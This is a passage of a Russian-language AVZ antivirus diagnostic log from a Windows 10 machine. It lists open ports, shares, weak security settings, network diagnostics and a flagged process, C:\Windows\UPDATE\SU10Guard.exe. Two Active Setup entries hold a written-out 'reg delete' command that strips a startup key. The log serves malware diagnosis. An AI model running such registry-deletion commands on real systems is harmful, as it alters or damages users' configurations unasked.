137	LISTENING	--	--	System [4] ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64	Microsoft NET
138	LISTENING	--	--	System [4] ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	x64	Microsoft NET
Обнаружено элементов - 88, опознано как безопасные - 48

Downloaded Program Files (DPF)

Имя файла	Редиректор	Описание	Производитель	CLSID	URL загрузки
Обнаружено элементов - 0, опознано как безопасные - 0

Апплеты панели управления (CPL)

Имя файла	Редиректор	Описание	Производитель
Обнаружено элементов - 35, опознано как безопасные - 35

Active Setup

Имя файла	Редиректор	Описание	Производитель	CLSID
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OPENVPN-GUI /f ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64			{E5931AF4-2A8F-48A5-AFC8-460348F480E8} Удалить
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OPENVPN-GUI /f ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64			{E5931AF4-2A8F-48A5-AFC8-460348F480E8} Удалить
Обнаружено элементов - 22, опознано как безопасные - 20

Файл HOSTS

Запись файла Hosts

Протоколы и обработчики

Имя файла	Редиректор	Тип	Описание	Производитель	CLSID
Обнаружено элементов - 47, опознано как безопасные - 47

Общие ресурсы

Сетевое имя	Путь	Примечания
C$	C:\	Стандартный общий ресурс
D$	D:\	Стандартный общий ресурс
F$	F:\	Стандартный общий ресурс
G$	G:\	Стандартный общий ресурс
ADMIN$	C:\Windows	Удаленный Admin
IPC$		Удаленный IPC

Задания фоновой интеллектуальной службы передачи файлов (BITS)

Идентификатор задания

Имя задания

Статус

URL или имя загружаемого файла

Имя сохраняемого файла

Приложение, вызываемое при завершении задания

Подозрительные объекты

Файл

Редиректор

Описание

Тип

Протокол утилиты AVZ версии 5.55
Сканирование запущено в 12.11.2021 18:48:17
Загружена база: сигнатуры - 297569, нейропрофили - 2, микропрограммы лечения - 56, база от 12.11.2021 04:00
Загружены микропрограммы эвристики: 417
Загружены микропрограммы ИПУ: 10
Загружены цифровые подписи системных файлов: 617080
Режим эвристического анализатора: Максимальный уровень эвристики
Режим лечения: выключено
Версия Windows: 10.0.18363,  "Windows 10 Enterprise" (Windows 10 Enterprise) x64, дата инсталляции 01.11.2020 23:39:15 ; AVZ работает с правами администратора (+)
Восстановление системы: включено
1. Поиск RootKit и программ, перехватывающих функции API
1.1 Поиск перехватчиков API, работающих в UserMode
 Анализ kernel32.dll, таблица экспорта найдена в секции .rdata
 Анализ ntdll.dll, таблица экспорта найдена в секции .text
 Анализ user32.dll, таблица экспорта найдена в секции .text
 Анализ advapi32.dll, таблица экспорта найдена в секции .text
 Анализ ws2_32.dll, таблица экспорта найдена в секции .text
 Анализ wininet.dll, таблица экспорта найдена в секции .text
 Анализ rasapi32.dll, таблица экспорта найдена в секции .text
 Анализ urlmon.dll, таблица экспорта найдена в секции .text
 Анализ netapi32.dll, таблица экспорта найдена в секции .text
1.4 Поиск маскировки процессов и драйверов
 Проверка не производится, так как не установлен драйвер мониторинга AVZPM
2. Проверка памяти
 Количество найденных процессов: 133
Анализатор - изучается процесс 3228 C:\Windows\UPDATE\SU10Guard.exe
[ES]:Может работать с сетью
[ES]:Приложение не имеет видимых окон
[ES]:Размещается в системной папке
 Количество загруженных модулей: 184
Проверка памяти завершена
3. Сканирование дисков
4. Проверка Winsock Layered Service Provider (SPI/LSP)
 Настройки LSP проверены. Ошибок не обнаружено
5. Поиск перехватчиков событий клавиатуры/мыши/окон (Keylogger, троянские DLL)
6. Поиск открытых портов TCP/UDP, используемых вредоносными программами
 Проверка отключена пользователем
7. Эвристичеcкая проверка системы
Проверка завершена
8. Поиск потенциальных уязвимостей
>> Службы: разрешена потенциально опасная служба TermService (Службы удаленных рабочих столов)
> Службы: обратите внимание - набор применяемых на ПК служб зависит от области применения ПК (домашний, ПК в ЛВС компании ...)!
>> Безопасность: разрешен автозапуск программ с CDROM
>> Безопасность: разрешен административный доступ к локальным дискам (C$, D$ ...)
>> Безопасность: к ПК разрешен доступ анонимного пользователя
Проверка завершена
9. Мастер поиска и устранения проблем
 >>  Заблокированы настройки системы Windows Update
 >>  Таймаут завершения процессов находится за пределами допустимых значений
 >>  Разрешен автозапуск с HDD
 >>  Разрешен автозапуск с сетевых дисков
 >>  Разрешен автозапуск со сменных носителей
Проверка завершена
Просканировано файлов: 317, извлечено из архивов: 0, найдено вредоносных программ 0, подозрений - 0
Сканирование завершено в 12.11.2021 18:48:51
Сканирование длилось 00:00:37
Выполняется исследование системы
Диагностика сети
 DNS and Ping test
  Host="yandex.ru", IP="5.255.255.50,77.88.55.66,5.255.255.60,77.88.55.50", Ping=OK (0,25,5.255.255.50)
  Host="google.ru", IP="216.58.210.163", Ping=OK (0,42,216.58.210.163)
  Host="google.com", IP="216.58.209.174", Ping=OK (0,49,216.58.209.174)
  Host="www.kaspersky.com", IP="93.159.228.40", Ping=OK (0,33,93.159.228.40)
  Host="www.kaspersky.ru", IP="77.74.178.40", Ping=OK (0,28,77.74.178.40)
  Host="dnl-03.geo.kaspersky.com", IP="93.191.13.106", Ping=OK (0,35,93.191.13.106)
  Host="dnl-11.geo.kaspersky.com", IP="62.128.100.81", Ping=OK (0,36,62.128.100.81)
  Host="activation-v2.kaspersky.com", IP="212.5.89.37", Ping=OK (0,33,212.5.89.37)
  Host="odnoklassniki.ru", IP="5.61.23.11,217.20.155.13,217.20.147.1", Ping=OK (0,34,5.61.23.11)
  Host="vk.com", IP="87.240.190.67,87.240.190.78,87.240.190.72,93.186.225.208,87.240.137.158,...", Ping=OK (0,39,87.240.190.67)
  Host="vkontakte.ru", IP="87.240.139.194,87.240.190.67,87.240.190.78,93.186.225.208,87.240.137.158,...", Ping=OK (0,39,87.240.139.194)
  Host="twitter.com", IP="104.244.42.129,104.244.42.65", Ping=OK (0,69,104.244.42.129)
  Host="facebook.com", IP="31.13.72.36", Ping=OK (0,40,31.13.72.36)
  Host="ru-ru.facebook.com", IP="31.13.72.8", Ping=OK (0,40,31.13.72.8)
 Network IE settings
  IE setting AutoConfigURL=
  IE setting AutoConfigProxy=
  IE setting ProxyOverride=
  IE setting ProxyServer=
  IE setting Internet\ManualProxies=
 Network TCP/IP settings
  Interface: "Hamachi"
   IPAddress = "0.0.0.0"
   DHCPIPAddress = "0.0.0.0"
   SubnetMask = "255.0.0.0"
   DHCPSubnetMask = "255.0.0.0"
   DefaultGateway = "25.0.0.1"
   NameServer = ""
   Domain = ""
   DhcpServer = "255.255.255.255"
  Interface: "Ethernet"
   IPAddress = "192.168.0.10"
   DHCPIPAddress = "192.168.0.10"
   SubnetMask = "255.255.255.0"
   DHCPSubnetMask = "255.255.255.0"
   DefaultGateway = ""
   NameServer = ""
   Domain = ""
   DhcpServer = "192.168.0.1"
 Network Persistent Routes

Исследование системы завершено
Команды скрипта Добавить в скрипт команды:

Дополнительные операции:

Список файлов